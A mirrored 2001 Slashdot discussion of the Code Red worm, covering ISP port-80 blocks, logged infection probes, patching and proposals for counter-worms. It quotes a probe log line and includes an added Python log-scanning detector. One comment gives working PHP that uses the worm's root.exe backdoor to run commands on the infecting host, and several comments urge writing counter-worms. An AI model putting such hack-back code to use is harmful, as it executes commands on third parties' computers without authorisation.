Slashdot Mirror


Code Redux

I don't understand why Symantec classifies a "remote root" exploit as only "medium" damage. Code Red is hitting cable modem networks especially hard, as the new variants scan "nearby" IPs in preference to random ones, which has apparently caused enough damage and network congestion that AT&T's residential broadband division (MediaOne) has cut off port 80 across their network to try and halt the spread of the worm, or so several submitters reported. Newsforge has a story about various reactions to the worm, and reader nettdata sent in an interesting story about the worm becoming the main course at a dinner of security specialists.

472 comments

  1. Re:My naive suggestion... by Anonymous Coward · · Score: 0
    Why doesn't someone write a Code Red anti-worm - it spreads via the same mechanism as does Code Red, but once it has infected a machine, it uses its root privileges to close the door behind itself, then deletes itself. It could even send mail to the administrator of the machine indicating the fact.

    So you want to start a virus/anti-virus war online, eh? If you build a bug to kill another bug, someone will use your bug to kill other stuff--it's not that hard to mutate your formerly "harmless" bug. Fucking idiot. Think before you post inane shit like this.

  2. Cutting off port 80 (hahaha) by CM39 · · Score: 1

    I saw one comment saying MediaOne had cut off port 80 on infected machines. Well, they have cut it off on all machines, at least in the .ne area.

    I don't run IIS; I run Sambar Server, so I am not and never was in danger of infection. The really ridiculous part of blocking port 80 is that it has leaks: my two servers have only received 16 connections since yesterday afternoon, where my normal hits are around 2000 per day.

    The following is a sample of the 16 hits.

    [08/Aug/2001:06:00:49 -0400] myservername 65.96.70.231 "" GET 404 "/default.ida" "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801% u9090%" 0 "-" "-"

    For those of you who don't know, that was an attempt at infecting me. If I were running a vulnerable system I would now be infected, so MediaOne's efforts are a total waste of time; all the fools have managed to do is block all my legitimate traffic while still allowing Code Red in.

    --

    "PMS is the time of the month when women act like men do all the time"
    Robert Heinlein
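The log line quoted above is the signature most people in this thread are counting by hand. The following is an added example, not code from the thread: it parses Apache combined-format access log lines (the post's own log is in Sambar's format, so that is an assumption), recognises a probe by the /default.ida request carrying the %u9090%u6858%ucbd3%u7801 marker, tells the two families apart by the padding letter (the original Code Red padded with 'N', Code Red II with 'X'), and tallies probes per source address. The sample log lines are constructed and use documentation-range addresses.

```python
import re
from collections import Counter

# Apache "combined" log format; Sambar (as quoted in the post above) lays the
# fields out differently, so this parser is an assumption about the reader's server.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Marker copied from the post: the start of the unicode-escaped shellcode that
# follows the padding in the /default.ida query string.
SHELLCODE_MARKER = "%u9090%u6858%ucbd3%u7801"


def parse_line(line):
    """Split one combined-format line into fields; None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def classify(path):
    """Return 'CodeRed', 'CodeRedII', 'CodeRed-unknown' or None for a request path.

    The family is read off the padding byte in front of the shellcode marker:
    the original Code Red padded with 'N', Code Red II with 'X'.
    """
    target, sep, query = path.partition("?")
    if sep == "" or target.lower() != "/default.ida":
        return None
    if SHELLCODE_MARKER not in query:
        return None
    filler = query[:1].upper()
    if filler == "N":
        return "CodeRed"
    if filler == "X":
        return "CodeRedII"
    return "CodeRed-unknown"


def survey(lines):
    """Tally Code Red probes by source address and by variant.

    Returns {'total', 'by_source', 'by_variant', 'unparsed'}; legitimate
    requests and plain /default.ida 404s without shellcode are ignored.
    """
    by_source, by_variant = Counter(), Counter()
    unparsed = 0
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            if line.strip():
                unparsed += 1
            continue
        variant = classify(rec["path"])
        if variant is None:
            continue
        by_source[rec["ip"]] += 1
        by_variant[variant] += 1
    return {"total": sum(by_variant.values()), "by_source": by_source,
            "by_variant": by_variant, "unparsed": unparsed}


# Constructed sample log: documentation-range addresses, shellcode truncated the
# way it is in the post above. Not a capture from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Aug/2001:06:00:49 -0400] "GET /default.ida?XXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090% HTTP/1.0" 404 282 "-" "-"',
    '192.0.2.10 - - [08/Aug/2001:06:00:51 -0400] "GET /default.ida?XXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090% HTTP/1.0" 404 282 "-" "-"',
    '198.51.100.7 - - [08/Aug/2001:06:02:13 -0400] "GET /default.ida?NNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090% HTTP/1.0" 404 282 "-" "-"',
    '203.0.113.5 - - [08/Aug/2001:06:03:00 -0400] "GET /index.html HTTP/1.1" 200 1432 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [08/Aug/2001:06:03:02 -0400] "GET /default.ida HTTP/1.1" 404 282 "-" "Mozilla/5.0"',
    'this line is garbage and is counted as unparsed',
]

if __name__ == "__main__":
    result = survey(SAMPLE_LOG)
    print(f"{result['total']} Code Red probes, {result['unparsed']} unparsed lines")
    for ip, n in result["by_source"].most_common():
        print(f"  {ip:16} {n}")
    for variant, n in result["by_variant"].most_common():
        print(f"  {variant:16} {n}")
```

Feed it `survey(open("access_log"))` to get the per-source counts people in this thread are tallying by hand.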
  3. Re:You misunderstand the danger by Unknown+Bovine+Group · · Score: 1
    If you're talking about the Microsoft patch, you're the moron. You're right that the worm has been disassembled and we know what it does, and it's NOT only memory-resident. The Microsoft patch will save you only if you're not already infected. If you have been infected, your registry settings have been altered to allow filesharing of your c and d drives and a trojan explorer.exe has been placed in your c:\ directory to restart the worm on reboot (and then run the real explorer.exe so you don't notice).

    --
    m00.
  4. Re:Code red growth spurts by Anemophilous+Coward · · Score: 1

    Actually it is not FUD here at our college. The main university recommendations for new students are for them to purchase computers with Win2000.

    Some of the sub-colleges, business and engineering, even *give* notebook computers to students here. These are all configured with Win2K for integration with their particular mail and online services. Of course, *hopefully*, the computers handed out by the university will be patched. But as I mentioned in my post, there are individuals on campus who still don't keep up on their administration duties.

    And again, most of our statistics showed a majority of students migrating to Win2K over the last year. We had plenty of mini-web servers running here at our campus. So don't disregard this as FUD. Perhaps at your local university, there isn't a push to Win2k. At ours there is and this could very well be commonplace at others, so my original post was not to spread fear but present a 'heads-up'.

    - A non-productive mind is with absolutely zero balance.
    - AC

  5. Re:The Perfect Solution:Code Redmond by Unknown+Bovine+Group · · Score: 1
    Microsoft creates a similar internet worm that gains admin access to install the patch! I'll leave it up to you to name it

    ....Code Redmond?....

    --
    m00.
  6. Re:OT: pedantic correction by staplin · · Score: 2

    Yeah, yeah I know 'boxen' is plural.

    I was typing too fast and my "any Win boxen" became "a Win boxen"...

  7. HP Printers, CSCO routers and port 80 (mixed bag) by stevedl · · Score: 1

    Hmmm, well - can't comment on the routers, but I snagged a 3 hour job updating the firmware on an HP LaserJet 4000 which was dying inexplicably - it only started doing so last week.
    Rumours are that it is port 80 related. Firmware update (which is no walk in the park, esp. on a Win2k-only network - thanks HP) seemed to do the trick.

    I'm still getting hit a couple of times an hour with port 80 requests ... whois says most of them seem to be from .tw. I'm nice and cosy in my firewall ignoring them ...

    And the whole deal with providers blocking port 80 - I'm not supporting their actions, it hasn't affected me and I haven't thought about this much etc. etc. - but would this drop requests to access port 80 on infected machines - which should prevent the unwashed DSL carriers from being dragged into a nasty DoS via access to http://your.box.is.mine/scripts/ blah blah blah?
    Or am I talking out of my dubya??

  8. Mozilla 0.9.3 by Dragoness+Eclectic · · Score: 1

    On a totally unrelated topic, is anybody else using Mozilla-0.93 and getting the "Slow down cowboy" message when posting to Slashdot? It seems like Mozilla is loading every page twice.

    No, just you. This is my third post today, using Moz 0.9.3, build ID: 2001080110, Win32 version. No problems with /. posts.

    --
    ---dragoness
  9. Re:My 'Data' Light has been going steady since Fri by mattc · · Score: 1
    Yeah, my receive data light has been blinking nonstop too.

    I'm on a small home network with a couple of other people so at first I thought someone had left one of those annoying "Gnutella" programs running (which have similar effects to a DoS).

    But then after reading about this virus I realized that it was it that was doing all this. It's amazing! I didn't realize how much damage a single 'doze virus could do!

    - Safe behind firewall

  10. Re:Code Red Self Test by kimihia · · Score: 1

    I've seen some interesting fun done with the backdoor.

    One was the changing of the default home page to say ... "This system has been infected! Fix me up as soon as possible!"

    I've also heard reports of people trying to run Internet Explorer and forward them to the page where the patch is, but from what I've heard it hasn't worked.

    A couplea hours ago this one was quite funny: http://202.108.221.61/

  11. Re:New payload? by weis · · Score: 1

    That's the footprint of the Code Red scanner that eeye.com puts out.

    --
    With sufficient thrust, pigs fly just fine. --RFC 1925
  12. Re:RoadRunner Fairfax VA unusable by balmeida · · Score: 1

    Yep... although I'm in Springfield, the cable has been up and down like a yoyo since Thursday or Friday ... and the times when it HAS been up it's been constantly berated with CR2 attempts and being massively spammed with ARP packets ... *sigh*

  13. Re:However, it it not remote root by Anonymous Coward · · Score: 0

    Here was my solution. I mapped .IDA to PHP4, then created "default.ida" in my server's root directory, with the following code:

    <?php
    $fp = fsockopen ($REMOTE_ADDR, 80, $errno, $errstr, 10);
    if ($fp) {
    fputs ($fp, "GET /scripts/root.exe?/C+start+http://www.microsoft.com/technet/security/bulletin/MS01-033.asp HTTP/1.0\r\n\r\n");
    fclose ($fp);
    }
    ?>

    This will launch a web browser window with information on patching their server. This could be modified to do any number of things.. shut down IIS itself if you can.

    Hope this helps :)

  14. RTFS by StikyPad · · Score: 1

    This letter was posted in the story.. Does anyone read those anymore?

  15. Re:Sarcasm by Anonymous Coward · · Score: 0

    I must have missed the sarcarism Or maybe that was a poor attempt at sarcasim After you get the grammar right you can work on the spelling of SARCASM

  16. poll by smeeze · · Score: 1

    next poll:

    number of code red attack attempts:
    o 0-10
    o 10-100
    o my IIS tried 600 attacks

  17. Re:Small util for Windows to listen on port 80? by budgenator · · Score: 1

    Connecting a stupid Windows box without a firewall like ZoneAlarm or BlackICE is just STUPID. I have trouble believing the /.ers do it. (Maybe the poster is a Microsoft spy.) Linux doesn't have to beat M$ off of the desktop; this whale really seems to be beached and suffocating under the weight of its own buffer overflows. They are going to have to go through millions of lines of code written by thousands of independent contractors to find them all; in short, it's probably impossible.

    --
    Apocalypse Cancelled, Sorry, No Ticket Refunds
  18. Re:My naive suggestion... by Anonymous Coward · · Score: 0

    Ditto to you! The code red worm already allows mutations as evidenced by the variants. You're just lucky that no one has already deleted your system yet.

  19. Re:Cutting off port 80 by Fjord · · Score: 2

    I was:
    Front page: click on "site map"
    Site map: click on "Policies"
    Policies: click on "What is the AT&T@Home Cable Internet Service Subscriber Agreement?"
    What is the AT&T@Home Cable Internet Service Subscriber Agreement?: click on "Leased Modem Subscriber Agreement"
    It's right there in 9(b)

    --
    -no broken link
  20. Cure for Code Red by von+Prufer · · Score: 1

    Someone should just write a Code Red variant of their own to download the patch for the web servers and install it...

    1. Re:Cure for Code Red by Anonymous Coward · · Score: 0

      Someone should.
      But it's more fun to see how far it's gonna go.

  21. Note to windows users by cronik · · Score: 1

    This was a comment stating that it wasn't hard to switch to *nix or BSD and configure a web server.

    --
    Information wants to be free like speech wants to be free, not like we want beer to be free.
  22. Re:Bring them to justice by Anonymous Coward · · Score: 0

    If someone should be brought to justice,
    it's only Microsoft.

    and yes you found us.

  23. Re:Medium damage by Zaediex · · Score: 1

    There's also the fact that the shell that the worm installs does not have sufficient privileges to do anything extremely destructive. Hell, you can't even use "net stop" to shut down a server after it scans you. I think Symantec's 'medium' classification is correct; after all, this little bug could have been a whole lot worse than it was.

    Zaed...

  24. Re:someone should make a code red three by TazMainiac · · Score: 1

    This is a really good question, I haven't even seen any discussion about it. Really, how hard would it be to write another virus/worm that acts like Code Red II, but instead of the exploits does something like:

    a) shuts off IIS
    b) downloads the patch and installs it
    c) puts a big notice on the screen about what it just did

    Seems appropriate to fight fire with fire, so to say.

  25. Re:Cutting off port 80? by Anonymous Coward · · Score: 0

    That isn't what my cable modem ISP is doing. As the article said, AT&T shut off all incoming connections to port 80. This is stupid and accomplishes nothing. The hosts receiving the connections aren't the problem. It is the ones sending them. And while they can't infect any more AT&T customers' machines, they still can infect distant hosts. And they haven't protected any AT&T hosts, either, since any vulnerable machine is already infected. I got over 1300 infection attempts. What they should have done is block outgoing connections to port 80 from the infected machines, like the provider you mentioned. You can bet that would get people's attention.

  26. Re:DAMNIT WILL SOMEONE PLEASE.... by Anonymous Coward · · Score: 0

    Let it leave
    we want it to exist

    That's a point

  27. Re:Twenty-four hours. by binner · · Score: 1

    I've been monitoring my logs similarly (289), and have had this little thought in my head. Has anyone set up a 'Wall of Shame'? It could be especially embarrassing for the Fortune 500 guys. It'd be trivial to do, and definitely worth a laugh!

    -Ben

    --
    Say what you mean, mean what you say! But please know what #$@% you are talking about!
  28. YOU SHOULD BE BANNED! by Anonymous Coward · · Score: 0

    AT+T say you should not be running servers as you slow everyone else down. I hope they ban you.

  29. Portsentry is your friend by peril · · Score: 1

    Been running full SMTP, HTTP, HTTPS, and SSH on @Home forever, with a portsentry monitor to blackhole scanners. With the Apache logs, at least I can blackhole more hosts, and not have any risk of future exploits of those hosts impacting me.

    I'm not too concerned about the TOS violations/enforcement, as services can move to any port no problem. (Just have to set up a new mailer in sendmail for the desired port from yer buddy's relay.)

    There really can't be anyone more savvy working @home than a group of 10-15 unix/networking people "thinking out loud" on irc. (Except fer them with their irc buds...)

    --Toilethead

  30. Our university is blocking infected systems by Buttonius · · Score: 1

    The network managers at the Delft University of Technology are monitoring the scans by the infected systems. If they cannot contact the maintainer of these systems they will configure the Ethernet switches to isolate them from the network.

  31. Only takes 12868 bytes by kimihia · · Score: 2, Informative

    Code Red will only slurp down 12868 bytes.

    Don't do it - the 'net has enough stress on it with 5.9 million IIS-running hosts trying to infect everything in sight without you transmitting a bunch of zeroes.

    Yes, so I had similar thoughts, but Daniel Lawson taught me better. (Thanks Daniel, BTW.)

  32. Re:Bring them to justice by WildBeast · · Score: 1

    I would say, both.

  33. Re:MS Problems Cause Patch Failures by beable · · Score: 1
    A recent issue of RISKS Digest pointed out that the site with the patch to fix this IIS problem has problems itself. FTP downloads of the patch are often being disconnected, resulting in receipt of only a partial patch file.
    That's because Microsoft ships their patches as exe files. If only they would be sensible and ship the patches as some sort of zip file, then you could tell if a file was truncated. It makes me shudder to think that people go to get a virus patch from a website, and the only format they can get it in is as an exe file. Maybe it's a trojan? Being in a zip-type archive gives you marginally more security, because they can put a digital signature in there as well. With an exe, you're just playing Virus Lotto every time you run one.
    --
    ...
  34. Re:Code Red Self Test by The_Weevil · · Score: 1

    All the Win2k users you know are running IIS?

    Err, yes, since it's bundled in Win2k and not disabled most people don't even know it's on. Does the indexing service rely on it or something? I heard Code Red gets in via the Indexing Service in Win2k, or maybe that's just a load of bullshit. What I do know is, most people are dumb. Yes, my friends who run Win2k are stupid, although I would have chosen the term 'inherently stupid'.

    Weevil

    --
    ghaa.
  35. Re:this thing is fascinating by twinpot · · Score: 1

    I noticed the exact same pattern. First it started with two attempts from one address, now it's two attempts, pause, one attempt.

    Fascinating...

  36. Re:small survey by IronChef · · Score: 2


    How did you automate that? My shell kung fu is weak.

    Or do you just have a lot of time for copy/paste? ;)

    FWIW I manually did about 40 IPs the other day. Similar ratio.

  37. Yes to RED by Anonymous Coward · · Score: 0

    Yes, Yes, Yes
    We would distribute code red and others to come
    and would intentionally infect our NT boxes
    so distribution continues.

    It should only stop when Microsoft is stopped.
    They Declared War ,we Accepted it.
    It is survival of The strongest.

    There is no Place for MS on OUR NET.

    <!-- OpenSource Terrorists. -->

    PS:
    We Thank Microsoft Corp.
    for making this code(RED) possible.

  38. Comment removed by account_deleted · · Score: 1

    Comment removed based on user account deletion

  39. Re:@Home by TazMainiac · · Score: 2, Informative

    It's all the ARP requests from all the Code Red probes for non-existent IP addresses.

    tcpdump -i eth0 -n

    (or whatever your external ethernet interface is).

    I was seeing 2000/minute ARP requests on Monday, don't know what it is now...

  40. Re:Medium damage by Unknown+Bovine+Group · · Score: 1
    We now have millions of machines exercising security by obscurity.

    If the infected machines are constantly running 300 threads advertising the fact that they're compromised, that's not very obscure, now is it?

    Considering how many scans I get on a cable network and how prized cable-based zombie machines are for DDoS attacks, I'd say there's a good number of scripties out there amassing huge collections of boxen...

    "Hacked by chinese" WTF? Spending all that time devising a crufty virus, and that's all they have to say?

    Yes it was rather crufty wasn't it? ;) I believe the 'Hacked by Chinese' tagging was limited to CodeRed 1 (and 1a or whatever they call it). Which is totally NOT what we're talking about here. In case you didn't know.

    --
    m00.
  41. Re:BIG NEWS: by Anonymous Coward · · Score: 0

    idiot

  42. Re:Why code red is still around by budgenator · · Score: 1

    Maybe no one told their sysadmins that they are no longer running BSD spoofing that it is M$ yet!

    --
    Apocalypse Cancelled, Sorry, No Ticket Refunds
  43. removal of code red by markw98 · · Score: 1

    Ok, here's the beef. A friend and I are having this debate. We both have Linux machines which are logging all these attempts to infect our machines from neighboring machines (whose owners weren't savvy or smart enough to avoid infection, or were just a day late). Is it unethical to offer removal services to these poor saps for a fee? I say no, it's not. His argument is, they might think you're the one that infected their machine in the first place. While his argument might have a valid point (somewhere), if I am offering legitimate services, and can prove that my machine is being attacked by their machines, what is wrong with getting paid to help these people clean their machines? Someone explain this to me. Regards, Mark

  44. ALL WINDOZE by twitter · · Score: 1

    It's more likely that his network has been back orificed long ago by someone's email cartoon or toy exe, a screen saver, pointer program or other piece of shiny frill. "Try to hit the gopher, while I root you out." The windows world has serious problems, and it is irresponsible to use that kind of software.

    --

    Friends don't help friends install M$ junk.

  45. Re:Man, I wish... by jeremyp · · Score: 1

    I can't speak for bind, but there are no known security exploits specific to current or recent releases of sendmail. By "recent", I mean in the last three to four years.

    --
    All I want is a secure system where it's easy to do anything I want. Is that too much to ask ~~ Randall Munroe
  46. Re:It is only Medium DAMAGE! by jesser · · Score: 2

    I agree. <imo>Anti-virus software companies are in the business of protecting against viruses; of preventing a large number of users from being compromised by the same code. They are not interested in the kind of security that would prevent script kiddies or social engineers from gaining access to your computer, and so they rate viruses by the amount of damage they cause, rather than rating security holes by the amount of damage they allow. I suppose they do this to be consistent with their stance that "the viruses are the enemy".</imo>

    By the way, did anyone else think it was strange that CERT listed anti-virus software companies, and only anti-virus software companies, in the "vendor information" section of their advisory about SirCam? They could have easily targeted

    • E-mail client vendors, for having poor user interface surrounding attachments. (Especially Microsoft, for releasing at least one version of OE that shows a very similar dialog when you double-click a .jpg attachment as it does when you double-click a .exe attachment.)
    • Microsoft, for relying on extensions as the only way for a user to tell the difference between a document and a program, rather than doing one or more of the following:
      • Giving users and programs a way to flag files as "executable" (or as "not executable"), like linux does with the +x mode.
      • Using a single, special extension for executable files. For example, foo.vbs would have to be renamed to foo.vbs.exe before it would run.
      • Using a special type of icon, or icon overlay, to indicate that something is a document. For example, always show documents as a piece of paper, and show an icon chosen by the associated application in the middle of the paper.
    • Microsoft, for not providing a function in Windows for "is a file with extension .foo a document or a program?".
    --
    The shareholder is always right.
  47. Re:mediaone EUA ALLOWS FTP AND HTTP SERVERS by IronChef · · Score: 2


    I wonder how far it can be pushed? My server on @Home dishes out almost 3,000 pageviews per day. (!) I'm starting to get worried. I need a backup plan in case they pull the plug on me.

  48. Re:No patch for Alpha NT 4 machines by BrookHarty · · Score: 1

    It infected Alpha code for the Indexing service, so it wasn't only x86. Wonder how many other worms can do this type of damage.

  49. Re:BIG NEWS: by DeputySpade · · Score: 1

    AIDS infects others for many years, and then kills its host.
    Um... Actually, doesn't AIDS simply leave root holes open so that other attackers can come in and eventually bring the host down? That's actually very similar to Code Red II

    --


    This space intentionally left blank
  50. Re:Code Red Self Test by beable · · Score: 1
    I've also heard reports of people trying to run Internet Explorer and forward them to the page where the patch is, but from what I've heard it hasn't worked.
    I think it does work, you know. Look at this page. As you can see here, infected computers are responding to commands to start up a browser and load a web page.

    On a totally unrelated topic, is anybody else using Mozilla-0.93 and getting the "Slow down cowboy" message when posting to Slashdot? It seems like Mozilla is loading every page twice.
    --
    ...
  51. Win2K a bit more common than one would think. by SimplyCosmic · · Score: 2
    Doing student network support for a midwest college, I came across several newly purchased IBM Thinkpads which came with Win2k installed. Enough, that I'd say one out of every thirty people with a laptop there had it.

    Additionally, since a lot of the colleges in Ohio have site license deals with Microsoft so that students can get the OS for cheap (or even free), there were just enough people figuring that 2000 must be better than 95, simply due to the numbers, to cause us a bit of aggravation.

    Of course, out of those people, most probably don't have IIS installed, but I've come across just enough people who install random things they don't need to say that the problem, while small, certainly isn't insignificant.

  52. Stop it! by muffen · · Score: 1

    Let's just write a new worm that goes out and finds computers with this vulnerability. If it manages to get onto a computer, it will automatically download the Microsoft patch and apply it. Problem solved... wasn't so hard now.. was it?

  53. Re:You misunderstand the danger by Des+Herriott · · Score: 1

    I really don't think you're in any position to call Illserve a moron. Your advice is dangerous & stupid, Illserve has it right.

    Even once patched, your machine is not safe. "You won't necessarily find all backdoors" ? Then your machine is toast anyway.

  54. Verizon closes port 80 indefinatly by cybrthng · · Score: 2
    Verizon has told me they closed port 80 indefinitely, thus making my DSL useless. They start filtering SMTP access to non-Verizon email servers today (which don't let you send email that isn't using a Verizon domain).

    I know I'll be switching. I don't pay 80 bucks a month to just surf the net on Verizon's terms. I do use my DSL for work, VPN, testing websites and personal pages.

    Is there anything "We" can do? The terms of service specifically state it is up to the END user to do all necessary functions to protect HIS data. Verizon makes no guarantees of service, so how can they modify the service?

    I wish I could get a class action for something.. they're limiting email to verizon.net emails only, filtering access.. what next?

  55. Laptops by Des+Herriott · · Score: 1

    Even if border security is good, consider: do you have any employees with vulnerable NT or 2K laptops? Do they take them home and connect to the internet from there?

    If the answer to the above two questions is "yes", then corporate infection is pretty much inevitable.

  56. We need a 'cultural revolution'.. by Anonymous Coward · · Score: 0

    We need to do something like in China during the time of MAO, the cultural revolution: gather all the sysadmins who don't do _SHIT_ with their boxes and don't check up on advisories etc, and have them shot! This Code Red crap was known as a buffer overflow as early as June 18th, and still machines are getting infected! It's so .. fucking.. pathetic. Well, not surprising when you consider that many commercial servers are not even patched with hotfixes known from 1998 etc.. Stupid admins must die.

  57. Re:check out the above link... by powerlord · · Score: 2

    Has anyone also noticed that Win2K comes with (and installs as part of the IIS "Group") an SMTP server ... gee ... any bets what the next round of exploits might target? :)

    --
    This space for rent. All reasonable inquiries will be entertained at proprietors discretion.
  58. Re:Code Red...easy fix by Anonymous Coward · · Score: 0

    how would it spread then?

  59. White Hatting Code Red by TOTKChief · · Score: 2
    Better yet, why not just run the patch installer for them?

    All well and good, I guess. But what of the day when people don't see your white hatting as such? Then someone will come out with a variant of your white hat hack on Code Red and, instead of having it hit the patch, will have it install something really nasty on the box, making it look like they're white hatting.

    Yes, this could be done now--infect a box, then have it hit a second virus that slams the box after the DDoS is done--but it would be more elegant after someone started to white hat Code Red.

  60. Re:Bring them to justice by Anonymous Coward · · Score: 0

    Nah, we should track down the stupid admins that get this exploit installed on their servers and have them flogged, and sue them for financial damage.

  61. Re:Cutting off port 80 by RocketRay · · Score: 1

    Just put your Apache server on another port, say 8080. That's what I did. Then you just tell people to tack ":8080" after your domain.

    /etc/httpd/conf/httpd.conf is your file!

  62. Re:"Medium" Damage by netsharc · · Score: 0
    Not that an empty hard disk would be able to host a server that can spit out that HTML...

    Ooh, that would be a neat hack; own the server, set up a ramdisk, move yourself into it, set up a HTTP server (in RAM), kill all running programs (that's "take over control of the computer from Windows") and format the disk.. woah, pull that and I'll be impressed. :) .. reboot the machine and everything's gone.

    --
    What time is it/will be over there? Check with my iPhone app!
  63. check out the above link... by budgenator · · Score: 1
    The graph at netcraft.com Survey shows Apache's market share slipping lately; I bet that changes pretty quick. And just think, Microsoft is paying for ads in "Linux Magazine" to woo back hosting providers, just before their software gets plastered by CodeRed et al. Glad we are not paying extra for an NT server.

    Maybe Microsoft's next EULA should have a clause that allows Microsoft to collect damages to their reputation for "failing to properly maintain and apply official required Updates to Microsoft Software".

    I think John Wayne said "Life is tough, it's tougher when you're stupid." Get the patch or turn it off.

    --
    Apocalypse Cancelled, Sorry, No Ticket Refunds
    1. Re:check out the above link... by heikkih · · Score: 1

      And maybe the reason why IIS is gaining on Apache is the same reason this worm still is so widespread: Win 2K installs IIS as default without telling the user.

      An ip-address in my office building popped up in my apache-logs on monday. I tracked the guy down, and it turned out he just had plugged a laptop with a freshly installed win2k into the network.

      Five minutes after he had come to work, his machine was compromised. I told him to take a backup of and review all necessary documents on his machine for possible other infections/fuckups and have the machine reformatted/installed.

      These days you can't even install Win2k on a computer connected to the net. It will be compromised before you've got the time to patch it and/or deactivate the default settings.
      --

    2. Re:check out the above link... by stx23 · · Score: 1

      Win 2K installs IIS as default without telling the user.
      Unless you are installing Win2K server, it doesn't install IIS. If you are installing Win2K Professional(aka Workstation), you have to explicitly select IIS for install.

  64. Re:It's about time... by Anonymous Coward · · Score: 0

    10 simultaneous connections.

  65. Re:Man, I wish... by Anonymous Coward · · Score: 0

    What makes you believe that this webserver is the ultimate cause of computer security bugs?

    Past track record, and the lack of any way to audit it for further issues?

  66. Re:Cutting off port 80? by jeremyp · · Score: 1

    My local cable provider technically bans any type of server, the reason being a) the bandwidth is asymmetrical b) they want you to buy a more expensive business contract to run servers c) they can give people NATted addresses. However, they don't appear to monitor traffic and provided you don't abuse the system they don't care.

    --
    All I want is a secure system where it's easy to do anything I want. Is that too much to ask ~~ Randall Munroe
  67. Re:My naive suggestion... by netsharc · · Score: 0

    It would be a nice idea, I remember reading a reply to a similar idea as "It wouldn't be nice netiquette if you messed with other people's computer, even if you mean well.".. well I would say if someone writes the anti-worm, they can just tell the clueless admin "Sorry I had to do this, since you were too clueless to patch your own server."..

    --
    What time is it/will be over there? Check with my iPhone app!
  68. Re:Cutting off port 80? by Anonymous Coward · · Score: 0

    I'm not sure what cutting off port 80 meant for them, but at my school, the students' machines cannot access port 80 of servers outside the school network.

    So they're not blocking our port 80, but other ports 80. We can still access websites using the school proxy/cache.

    This way, infected IIS servers inside our network won't abuse internet bandwidth and won't spread the worm outside our network. Since all production servers in the school are Unix, admins don't care about contamination in their network.

  69. Re:Cutting Off Port 80? by Anonymous Coward · · Score: 0
    Yes it is, at least in my location.

    The policy seems to vary depending on where you are in the country.

    I *wish* they'd block off port 80 here.. my rd light has been blinking nonstop for days!

  70. Re:Twenty-four hours. by Anonymous Coward · · Score: 1

    That's what the ambiguous "Underrated" moderation is for.

  71. Re:Cutting off port 80 by Anonymous Coward · · Score: 0

    http://help.broadband.att.com/faq.jsp?content_id=416 NO servers. Therefore, they will get no more money from me.

  72. Re:Code Red Self Test by staplin · · Score: 2

    True, this will tell you if you are *infected*, but it doesn't tell you if you are *vulnerable* (but not yet infected).

  73. note: to windows users by budgenator · · Score: 1

    neither is CodeRed, SirCam32 etc.

    --
    Apocalypse Cancelled, Sorry, No Ticket Refunds
  74. Re:Useless use of cat by beable · · Score: 1
    You might have more chance to get hired if you changed
    cat file | grep pattern
    into
    grep pattern file
    I like to use:
    cat file |cat |cat |cat |cat |cat |cat |cat |cat |cat |cat |cat |cat |cat |cat |cat |cat |cat |cat |cat |cat |cat |cat |cat |cat |cat |cat |cat |cat |cat | grep pattern
    Now that's abusing a cat!
    --
    ...
  75. Re:small survey by MS · · Score: 1
    Many of the "Under Construction" pages or "successful IIS install" are in reality multi-homed webservers. This is the page you get by default, if you don't specify any hostname.

    You may look up the IP address on netcraft.com and see which other webservers are running at the same Netblock Owner, you'll be surprised!

    Meanwhile the hits from Code Red on my server have reached 12000 (yes, it's a multi-IP server), and are doubling every 2 days with no end in sight!!!

    bye
    Markus S. --

  76. Re:BIG NEWS: by TrollMaster5000 · · Score: 1

    True. True. They are lazy. Hell, when the bind bug came out, I was one of the 1st 50 to patch mine. A lot of those MCSEs don't even know it's out there. I'm still getting hits on Apache.

  77. Re:small survey by Midnight+Thunder · · Score: 1

    I don't know what the tester used, but you could easily throw something together in 10 min using Java. You could probably do this just as easily with some other language, but Java is the one I know best and offers a good API for accessing http servers ( java.net.URLConnection ).

    --
    Jumpstart the tartan drive.
  78. Re:Cutting off port 80? by ewilts · · Score: 1

    Here's AT&T's e-mail response from Tuesday morning:

    Thank you for contacting AT&T BroadBand Cable Internet Service.

    We have blocked port 80 as a temporary measure and will be lifting the block when our network engineers have finished their work. I do not have an estimated time for this, however. I apologize for any inconvenience that you may be experiencing.


    During a Tuesday afternoon chat session, another one of their support reps stated:

    We may have some more information regarding port 80 later this evening, otherwise you could check back tomorrow for possible updates. I do apologize for the inconvenience.

    On the chat session, whoever answered the chat at least knew about the port 80 block so the word is getting out within AT&T support - not like Monday when they were totally clueless. The online Network Status is still vague "We are experiencing service interruptions affecting All Regions that may cause intermittent network connectivity. "

    As for whether or not AT&T allows servers, that is up for debate. Their 2nd level tech support said they don't, but I quoted the leased line subscriber agreement, located at http://help.broadband.att.com/subagreelease.jsp, specifically section 9b that says that servers are allowed.

    --
    .../Ed
  79. AT&T @Home Not Cut Off in Palatine, IL by Chelloveck · · Score: 3, Interesting

    AT&T @Home hasn't cut off port 80 where I live yet (Palatine IL, the NW Chicago 'burbs). A quick grep of my Apache logs shows that I got hit 499 times yesterday with requests for 'default.ida'. Just over 1200 times since this thing started.

    What really annoys me is that I just inherited responsibility for maintaining code for a print server product we sell. Code Red is knocking these things off the net left and right (buffer overflow processing the URL, I suspect) and customers are screaming. Oh, and did I mention that since inheriting the code I haven't even been able to get the fscking debugger to run yet!?

